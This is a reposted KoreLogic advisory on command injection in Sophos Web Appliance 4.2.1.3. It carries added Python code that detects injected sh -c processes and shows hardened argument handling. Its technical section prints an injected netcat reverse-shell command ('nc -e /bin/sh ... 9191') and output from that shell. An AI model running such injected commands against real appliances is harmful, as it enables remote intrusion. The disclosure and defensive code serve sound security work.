Sophos Web Appliance Remote Code Execution Vulnerability

ID 1337DAY-ID-26246
Type zdt
Reporter Matthew Bergin
Modified 2016-11-04T00:00:00


Exploit for php platform in category web applications

Title: Sophos Web Appliance Remote Code Execution
Advisory ID: KL-001-2016-009
Publication Date: 2016.11.03
Publication URL:

1. Vulnerability Details

     Affected Vendor: Sophos
     Affected Product: Web Appliance
     Affected Version: v4.2.1.3
     Platform: Embedded Linux
     CWE Classification: CWE-78: Improper Neutralization of Special Elements
                         used in an OS Command ('OS Command Injection'),
                         CWE-88: Argument Injection or Modification
     Impact: Remote Code Execution
     Attack vector: HTTP

2. Vulnerability Description

     An authenticated user of any privilege can execute arbitrary
     system commands as the non-root webserver user.

3. Technical Description

     Multiple parameters to the web interface are unsafely handled and
     can be used to run operating system commands, such as:

     POST /index.php?c=logs HTTP/1.1
     Host: [redacted]
     User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0) Gecko/20100101 Firefox/46.0
     Accept: text/javascript, text/html, application/xml, text/xml, */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     DNT: 1
     X-Requested-With: XMLHttpRequest
     X-Prototype-Version: 1.6.1
     Content-Type: application/x-www-form-urlencoded; charset=UTF-8
     Content-Length: 305
     Connection: close


     HTTP/1.1 200 OK
     Date: Tue, 10 May 2016 15:35:05 GMT
     Server: Apache
     Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0,
     Pragma: no-cache
     X-Frame-Options: sameorigin
     X-Content-Type-Options: nosniff
     Connection: close
     Content-Type: text/html; charset=utf-8
     Content-Length: 207

     {"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10


     The vulnerable parameters are: by, request_id, and txt_filter_domain

     That request launches the following process on the SWA:

     1000     16851  0.0  0.0   2728  1040 ?        S    15:43   0:00 sh -c /opt/perl/bin/ --report=Filter --res=- --type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA==' --start='2016/05/10' --end='2016/05/10' --action=''
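     The process line above is also the signal a defender can key on: a
     `sh -c` child of the web-server user whose argument string carries
     shell command substitution. The Python below is an added example,
     not part of the advisory or of Sophos' code. It parses `ps aux`-style
     lines (a constructed sample that mirrors the listing above; the script
     path uses the placeholder REPORT_SCRIPT because the advisory elides it)
     and flags processes whose unquoted argument text contains backticks,
     `$(`, or command-chaining characters.

```python
import re

# Constructed sample of `ps aux` output. The first line mirrors the injected
# process from the advisory (script name replaced by a placeholder since the
# advisory elides it); the second is what a clean invocation looks like.
SAMPLE_PS = (
    "1000     16851  0.0  0.0   2728  1040 ?        S    15:43   0:00 sh -c "
    "/opt/perl/bin/REPORT_SCRIPT --report=Filter --res=- "
    "--type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA==' "
    "--start='2016/05/10' --end='2016/05/10' --action=''\n"
    "1000     16852  0.0  0.0   2728  1040 ?        S    15:44   0:00 sh -c "
    "/opt/perl/bin/REPORT_SCRIPT --report=Filter --res=- "
    "--type=user_timeline --filter='dGVzdA==' "
    "--start='2016/05/10' --end='2016/05/10' --action=''\n"
)

# `ps aux` has ten fixed columns before COMMAND:
# USER PID %CPU %MEM VSZ RSS TTY STAT START TIME
PS_FIXED_COLUMNS = 10

# Shell constructs that have no business inside a report argument once the
# legitimately single-quoted values have been removed.
METACHAR_RE = re.compile(r"`|\$\(|\$\{|[;|&<>]")
SINGLE_QUOTED_RE = re.compile(r"'[^']*'")


def parse_ps_line(line):
    """Split one `ps aux` line into user, pid and the full command string."""
    parts = line.split(None, PS_FIXED_COLUMNS)
    if len(parts) <= PS_FIXED_COLUMNS:
        return None  # fewer columns than expected: blank or malformed line
    return {"user": parts[0], "pid": int(parts[1]), "cmd": parts[PS_FIXED_COLUMNS]}


def injected_metachars(cmd, script_marker):
    """Return the shell metacharacters found in an `sh -c` body for script_marker.

    Values the application itself wraps in single quotes (e.g. --filter='...')
    are blanked first, so a '|' inside a quoted filter does not trip the check,
    while a backtick that sits outside the quotes, or breaks out of them, does.
    """
    prefix = "sh -c "
    if not cmd.startswith(prefix) or script_marker not in cmd:
        return []
    body = SINGLE_QUOTED_RE.sub("''", cmd[len(prefix):])
    return METACHAR_RE.findall(body)


def find_suspicious(ps_output, script_marker="/opt/perl/bin/", webserver_user="1000"):
    """PIDs of the web-server user's `sh -c` children whose arguments carry shell syntax."""
    hits = []
    for line in ps_output.splitlines():
        rec = parse_ps_line(line)
        if rec is None or rec["user"] != webserver_user:
            continue
        if injected_metachars(rec["cmd"], script_marker):
            hits.append(rec["pid"])
    return hits


if __name__ == "__main__":
    for pid in find_suspicious(SAMPLE_PS):
        print(f"suspicious sh -c child pid={pid}")
```

     Backticks and `$(` are high-confidence indicators; the chaining
     characters may need tuning if legitimate filter values are ever passed
     unquoted. Running this against periodic `ps aux` snapshots, or against
     process-creation audit events, gives a cheap detection for this class
     of bug on the appliance while the vendor fix is being rolled out.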

     From the shell launched via netcat:

     id;uname -a;uptime
     uid=1000(spiderman) gid=1000(spiderman)
     Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux
     15:52:34 up  4:26,  0 users,  load average: 0.11, 0.12, 0.15
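     The root cause is that request parameters are spliced into a single
     string handed to `sh -c`. The Python below is an added example written
     for this page, not the appliance's PHP code or Sophos' fix. It shows the
     vulnerable string construction beside a hardened one that never invokes
     a shell and validates each parameter against the shape the report
     script expects. The parameter names type/filter/start/end, the script
     path REPORT_SCRIPT, the allowlist of report types and the date and
     base64 filter formats are assumptions; the option names come from the
     process listing in section 3.

```python
import base64
import re
import subprocess

# Placeholder: the advisory elides the report script's actual path.
REPORT_SCRIPT = "/opt/perl/bin/REPORT_SCRIPT"
# Assumed allowlist of values the --type option accepts; the advisory only
# shows user_timeline.
ALLOWED_TYPES = {"user_timeline"}
DATE_RE = re.compile(r"^\d{4}/\d{2}/\d{2}$")
BASE64_RE = re.compile(r"^[A-Za-z0-9+/]*={0,2}$")


class InvalidParameter(ValueError):
    """Raised when a request parameter does not match its expected shape."""


def build_vulnerable_command(params):
    """The pattern the advisory describes: raw parameters concatenated into one
    shell string. Anything in `type` after a backtick or `$(` is run by sh."""
    return (
        f"{REPORT_SCRIPT} --report=Filter --res=- --type={params['type']} "
        f"--filter='{params['filter']}' --start='{params['start']}' "
        f"--end='{params['end']}' --action=''"
    )


def validate_type(value):
    if value not in ALLOWED_TYPES:
        raise InvalidParameter(f"unknown report type: {value!r}")
    return value


def validate_date(value):
    if not DATE_RE.match(value):
        raise InvalidParameter(f"bad date: {value!r}")
    return value


def validate_filter(value):
    """The filter travels base64-encoded (the advisory shows dGVzdA==, i.e. 'test')."""
    if not BASE64_RE.match(value):
        raise InvalidParameter(f"filter is not base64: {value!r}")
    try:
        base64.b64decode(value, validate=True)
    except ValueError as exc:  # binascii.Error is a ValueError subclass
        raise InvalidParameter(f"filter does not decode: {value!r}") from exc
    return value


def build_report_argv(params):
    """Hardened form: validated values, one argv element each, no shell.

    Every option is passed as a single `--name=value` element, so a value can
    neither become a separate option (CWE-88) nor be parsed by a shell (CWE-78).
    Without a shell there is nothing to quote, so --filter and --action are
    passed bare rather than wrapped in single quotes.
    """
    return [
        REPORT_SCRIPT,
        "--report=Filter",
        "--res=-",
        f"--type={validate_type(params['type'])}",
        f"--filter={validate_filter(params['filter'])}",
        f"--start={validate_date(params['start'])}",
        f"--end={validate_date(params['end'])}",
        "--action=",
    ]


def is_valid_request(params):
    """True when every parameter passes validation; the check a request
    handler runs before calling run_report."""
    try:
        build_report_argv(params)
    except (InvalidParameter, KeyError):
        return False
    return True


def run_report(params):
    """Execute the report script directly (argv list, shell=False), never via `sh -c`."""
    return subprocess.run(build_report_argv(params), capture_output=True,
                          text=True, check=False)


# Constructed request parameters: the injected value reuses the shape from
# the advisory but substitutes a harmless command substitution.
INJECTED = {"type": "user_timeline`id`", "filter": "dGVzdA==",
            "start": "2016/05/10", "end": "2016/05/10"}
CLEAN = dict(INJECTED, type="user_timeline")

if __name__ == "__main__":
    print("vulnerable:", build_vulnerable_command(INJECTED))
    print("hardened  :", build_report_argv(CLEAN))
    print("accepted  :", is_valid_request(INJECTED))
```

     The allowlist on `--type` does the real work: it rejects the injected
     value outright, rather than trying to neutralise metacharacters. If a
     code path genuinely cannot drop `sh -c`, quoting every value
     (`escapeshellarg` in PHP, `shlex.quote` in Python) is the minimum, but
     it still leaves the shell in the loop; the argv list plus validation
     removes the whole bug class and, because each option stays a single
     `--name=value` element, closes the argument-injection variant as well.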

4. Mitigation and Remediation Recommendation

     The vendor has issued a fix for this vulnerability in Version
     4.3 of SWA. Release notes available at:

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc.

6. Disclosure Timeline

     2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos.
     2016.09.14 - Sophos requests KoreLogic re-send vulnerability details.
     2016.09.28 - KoreLogic requests status update.
     2016.09.28 - Sophos informs KoreLogic that an update including a fix
                  for this vulnerability will be available near the end
                  of October.
     2016.10.13 - Sophos informs KoreLogic that the update was released to a
                  limited customer base and is expected to be distributed
                  at-large over the following week.
     2016.11.03 - Public disclosure.

7. Proof of Concept

     See 3. Technical Description.
